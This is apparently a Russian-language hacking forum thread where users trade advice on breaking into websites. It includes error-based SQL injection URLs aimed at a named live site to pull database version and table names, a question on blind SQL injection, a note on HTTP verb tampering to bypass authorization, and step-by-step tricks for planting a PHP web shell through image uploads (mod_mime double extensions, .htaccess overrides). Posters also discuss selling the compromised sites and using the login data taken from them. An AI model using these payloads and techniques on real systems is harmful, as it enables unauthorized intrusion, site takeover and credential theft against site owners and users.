вот вот про это где можно почитать, на русском By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold: it uses a security control that lists HTTP verbs the security control fails to block verbs that are not listed it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword: является ифективным методом атаки?
Если я не ошибаюсь, то эта уязвимость позволяет обходить basic-авторизацию отправляя запросы постом а не гетом. https://www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
Не получается вывести версию БД. http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+
Code: http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
Дальше не выводится, а где ошибка не пойму: http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+table_name+from+information_schema.`tables`+limit+0,1),floor(rand(0)*2))/*!having*/+min(0)+or+1+--+
Code: http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select/*!table_name*/+from+information_schema.tables+limit+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1--+ Ты так и будешь спрашивать каждый следующий шаг? Тогда я пожалуй катапультируюсь из данного трэда.
Привет всем. Как вывести часть файла..? more что-то не работает. При cat начало не видно... большой файл.
>Почему в уязвиостях? Или я что-то не понял? о_О Просто еще кое что хотел спросить... да не стал thnx.. буду вникать
Есть слепая скуля. Вывод ошибок отключен. Не работают функции mid(),substr() и т.д. Подзапросы выполнятся успешно, а когда в скули есть mid(), substr() то запрос всегда возвращает false. Может это не mysql? И как теперь мне ее крутить если она слепая?
Админка Indrive v4.01b поддерживает заливку jpg, jpeg, gif, png, doc, pdf, xls, zip, rar -файлов. Заливка шелла через картинки не получилась, как я ни старался. Реально ли залить шелл через оставшиеся форматы?
Попробуй залить картинку с php кодом, и обратится к ней как к php скрипту, пример, картинка test.gif в неё пишешь PHP: <?php phpinfo();?> заливается сюда: Code: http://site.com/upload/img/test.gif обращаешься так Code: http://site.com/upload/img/test.gif/.php Подробнее: http://habrahabr.ru/blogs/sysadm/100961/
Попробуй через mod_mime с подделкой content-type. Для FF качаешь дополнение Tamper Data. Возьми любую реальную картинку и вставь ей вконец php код. Включи Tamper Data. Отошли свою картинку и подмени имя картинки на: filename.php.jpglolo. Если включен mod_mime и кривая регулярка для проверки файла (проверит последнее вхождение .jpg и пропустит следующую приписку "lolo"), то у тебя будет работоспособный php-файл. Ничего не отрезается, т.е. обращаться по прямому пути: localhost/images/filename.php.jpglolo Работает из-за включенного mod_mime. Написал так много пунктов, потому что там может быть проверка Content-type, проверка картинки на валидность и т.д, а ты дал мало информации, ну а так наверняка. Если картинки чем-то сжимается на стороне сервера, то эксплуатировать не получится. Так же если идет фильтрация по черному списку (запрещаются всякие php, php5, phtml, etc), то можно залить .htaccess файл, который будет содержать код для выполнение картинок как php-файл. P.S.: Только сейчас увидел, что у тебя nginx. Под nginx не работает это. Нужен Apache.
Tigger идея чертовски хороша. но по ходу никак, тиц 250 и 90, могу за пару сотен отдать оба кому-нибудь. жалко выкидывать. и ещё один вопрос: в последнее время часто стал сталкиваться с тем, что в базах к сайтам попросту отсутсвуют логины с паролями или есть, но не подходят. Что в этих случаях делать?